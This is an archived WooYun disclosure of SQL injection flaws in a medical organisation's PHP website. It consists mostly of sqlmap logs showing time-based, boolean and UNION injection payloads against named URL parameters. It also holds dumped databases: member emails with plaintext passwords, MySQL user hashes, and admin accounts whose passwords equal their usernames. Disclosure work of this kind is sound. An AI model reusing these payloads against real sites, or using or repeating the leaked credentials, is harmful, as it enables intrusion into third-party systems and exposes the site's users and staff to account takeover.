乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-06: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
RT
注入点:
**.**.**.**/lishin/news/lishin_news_inner.php?id=955&page=
---Place: GETParameter: id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=955 AND SLEEP(5)&page=---[17:56:34] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.22, PHP 5.4.14back-end DBMS: MySQL 5.0.11[17:56:34] [INFO] fetching current user[17:56:34] [INFO] retrieved:[17:56:34] [WARNING] it is very important not to stress the network adapterndwidth during usage of time-based queriesroot@localhostcurrent user: 'root@localhost'
12个数据库,时间盲注 太慢了 证明一下
web server operating system: Windowsweb application technology: Apache 2.2.22, PHP 5.4.14back-end DBMS: MySQL 5.0.11[18:05:47] [INFO] fetching database names[18:05:47] [INFO] fetching number of databases[18:05:47] [WARNING] time-based comparison needs larger statistical modeg a few dummy requests, please wait..[18:05:55] [WARNING] it is very important not to stress the network adapndwidth during usage of time-based queries1[18:06:14] [INFO] adjusting time delay to 2 seconds due to good response2[18:06:20] [INFO] retrieved: in[18:07:08] [ERROR] invalid character detected. retrying..[18:07:08] [WARNING] increasing time delay to 3 seconds[18:07:46] [CRITICAL] unable to connect to the target url or proxy, sqlming to retry the request[18:07:53] [ERROR] invalid character detected. retrying..[18:07:53] [WARNING] increasing time delay to 4 secondsf[18:08:47] [ERROR] invalid character detected. retrying..[18:08:47] [WARNING] increasing time delay to 5 seconds[18:09:11] [ERROR] invalid character detected. retrying..[18:09:11] [WARNING] increasing time delay to 6 seconds
http://**.**.**.**/lishin/medical_education/cathedra_inner.php?mainAutoNo=0812301256
布尔型注入
Place: GETParameter: mainAutoNo Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mainAutoNo=0812301256' AND 9523=9523 AND 'Izlt'='Izlt Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: mainAutoNo=-9647' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL,CONCAT(0x3a6271653a,0x62527049736651584861,0x3a6d68653a), NULL, NULL, NULL, NUL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'VQy'='OVQy---[18:18:42] [INFO] testing MySQL[18:18:42] [INFO] confirming MySQL[18:18:43] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.22, PHP 5.4.14back-end DBMS: MySQL >= 5.0.0[18:18:43] [INFO] fetching current usercurrent user: 'root@localhost'
available databases [12]:[*] athca[*] information_schema[*] lishin[*] mysql[*] npo[*] performance_schema[*] purchaseweb[*] referral[*] referral_20141017[*] referral_20150917[*] survey[*] test
Table: member[17 columns]+--------------------+--------------+| Column | Type |+--------------------+--------------+| addStaff | int(11) || addTime | datetime || email | varchar(50) || endDate | varchar(10) || id | int(11) || level | tinyint(1) || level_permission | int(1) || manager_permission | varchar(1) || name | varchar(20) || note | text || org | varchar(50) || password | varchar(20) || permission | varchar(255) || startDate | varchar(10) || status | tinyint(1) || updateStaff | int(11) || updateTime | datetime |+--------------------+--------------+
Database: athca+--------+---------+| Table | Entries |+--------+---------+| member | 7 |+--------+---------+
[7 entries]+----------+---------------------+--------------------------+------------+----+-------+------------------+--------------------+----------+---------+------+----------+----------------------------+------------+--------+-------------+---------------------+| addStaff | addTime | email | endDate | id |level | level_permission | manager_permission | name | note | org | password | permission | startDate | status | updateStaff | updateTime |+----------+---------------------+--------------------------+------------+----+-------+------------------+--------------------+----------+---------+------+----------+----------------------------+------------+--------+-------------+---------------------+| NULL | NULL | admin | <blank> | 3 |[18:23:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.| ???? | dd321 | I1,J1,J2,J3,K1,L1,M1,N1,N2 | <blank> | 1 | 3 | 2015-10-30 15:23:45 || NULL | NULL | sunnyhsieh999@**.**.**.** | <blank> | 15 |9 | 3 | <blank> | ???-test | <blank> | ???? | 08528 | I1,J1,J2,J3,K1,L1,M1,N1,N2 | 2015-11-03 | 1 | 19 | 2015-11-04 18:11:28 || 19 | 2015-11-04 16:57:25 | juilan99123@**.**.**.** | <blank> | 25 |9 | 2 | <blank> | ???????? | <blank> | ???? | 08528 | J1,J3 | <blank> | 1 | 19 | 2015-11-04 17:10:14 || NULL | NULL | liuhngju@**.**.**.** | 2017-03-31 | 16 |1 | 3 | <blank> | ??? | ???? | ???? | 03534 | I1,J1,J2,J3,K1,L1,M1,N1,N2 | 2015-11-18 | 1 | 16 | 2015-12-02 21:24:11 || NULL | NULL | wangama@**.**.**.** | <blank> | 17 |2 | 3 | <blank> | ??? | <blank> | ???? | 03536 | I1,J1,J2,J3,K1,L1,M1,N1,N2 | 2015-11-18 | 0 | 16 | 2015-12-02 21:02:25 || 3 | 2015-10-29 11:37:15 | mis | <blank> | 19 |9 | 0 | <blank> | ???? | <blank> | ???? | cc321 | I1,J1,J2,J3,K1,L1,M1,N1,N2 | <blank> | 1 | 19 | 2015-10-29 16:43:06 || 3 | 2015-10-30 11:40:58 | chenls@**.**.**.** | <blank> | 24 |2 | 3 | <blank> | ?? | 123 | ???? | 123 | I1,J1,J2,J3,K1,L1,M1,N1,N2 | <blank> | 1 | 3 | 2015-11-04 14:49:17 |+----------+---------------------+--------------------------+------------+----+-------+------------------+--------------------+----------+---------+------+-----
又是16个
Database: mysql+-------+---------+| Table | Entries |+-------+---------+| user | 16 |+-------+---------+
没去解密
------+-------------+----------------+-------------+--------------+| Y | Y | <blank> | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | N | Y | localhost | Y | Y | Y | 0 | 0 | 0 | 0 | *C8F86FC89659A2F9A4A38D81209AF4C60446A267 | <blank> | Y | Y | Y | Y | Y | Y | Y | Y | Y | <blank> | <blank> | Y | Y | Y | root | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *E143248914F75405745876C5C9859BEF50A9A99C | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | npo | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *B4FF922909C29B9D6BEEA5B141D8877174C3AFB5 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | athca | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *DBCF972C4DB5FC32F9D606AA6A54C878A23E6EF1 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | purchaseWeb | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | % | N | N | N | 0 | 0 | 0 | 0 | *E925904C49FD0EFB9CE624B79C8E44C2F23693AE | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | **.**.**.** | <blank> | <blank> || Y | Y | NULL | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | % | Y | Y | Y | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | Y | Y | Y | Y | Y | Y | Y | Y | Y | <blank> | <blank> | Y | Y | Y | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | N | N | N | N | N | N | **.**.**.** | N | N | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | N | N | N | N | <blank> | <blank> | N | N | N | referral | <blank> | <blank> || N | N | NULL | N | N | N | N | N | N | Y | N | N | N | N | N | **.**.**.** | N | Y | N | 0 | 0 | 0 | 0 | *16CAA84BCECB32A5027AE22E9DA3673B1ACA5AE6 | <blank> | N | N | N | N | N | Y | N | N | N | <blank> | <blank> | N | N | Y | referral | <blank> | <blank> |+------------+--------------------+-----------------------+-------------+-------
又来9个
Database: npo+----------+---------+| Table | Entries |+----------+---------+| sys_user | 9 |+----------+---------+
明文
Table: sys_user[9 entries]+---------------------+---------------+---------------+---------------------+-------+----------+------+---------------------+-----------------+---------+---------+-------+---------+| add_date | adm_id | adm_pass | edit_date | email | group_id | lang | log_date | log_ip | name | notes | trash | user_id |+---------------------+---------------+---------------+---------------------+-------+----------+------+---------------------+-----------------+---------+---------+-------+---------+| 2013-08-05 16:03:02 | landseedlead | landseedlead | 2013-11-01 14:26:45 | NU[18:39:05] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.| ????? | <blank> | 0 | 5 || 2013-09-20 12:36:59 | landseedima | landseedima | 2013-09-20 12:37:30 | NULL | 10 | 1 | 2015-11-17 15:09:26 | **.**.**.** | ??????? | <blank> | 0 | 6 || 2013-09-20 12:38:12 | landseedhs | landseedhs | NULL | NULL | 12 | 1 | 2014-09-16 12:07:36 | **.**.**.** | ????? | <blank> | 0 | 7 || 2013-09-20 12:38:57 | landseedca | landseedca | NULL | NULL | 13 | 1 | 2016-01-05 16:37:10 | **.**.**.** | ????? | <blank> | 0 | 8 || 2013-09-20 12:39:28 | landseedss | landseedss | NULL | NULL | 11 | 1 | 2015-11-21 17:04:11 | **.**.**.** | ????? | <blank> | 0 | 9 || 2013-10-31 15:59:15 | landseedadmin | landseedadmin | 2015-12-16 17:01:16 | NULL | 14 | 1 | 2015-12-16 17:05:35 | **.**.**.** | ????? | <blank> | 0 | 10 || 2014-02-27 16:03:46 | landseedpr | landseedpr | 2014-02-27 16:04:06 | NULL | 15 | 1 | 2015-12-16 11:06:09 | **.**.**.** | ??????? | <blank> | 0 | 12 || 2015-06-12 08:57:00 | landseed123 | landseed123 | NULL | NULL | 16 | 1 | 2015-06-16 13:50:47 | **.**.**.** | ???? | <blank> | 0 | 13 || 2015-06-30 08:36:07 | landseeddc | landseeddc | NULL | NULL | 17 | 1 | 2015-09-23 17:55:35 | **.**.**.** | ???? | <blank> | 0 | 14 |+---------------------+---------------+---------------+---------------------+-------+----------+------+---------------------+-----------------+---------+---------+-------+---------+
危害等级:高
漏洞Rank:17
确认时间:2016-01-08 03:54
感謝通報
暂无
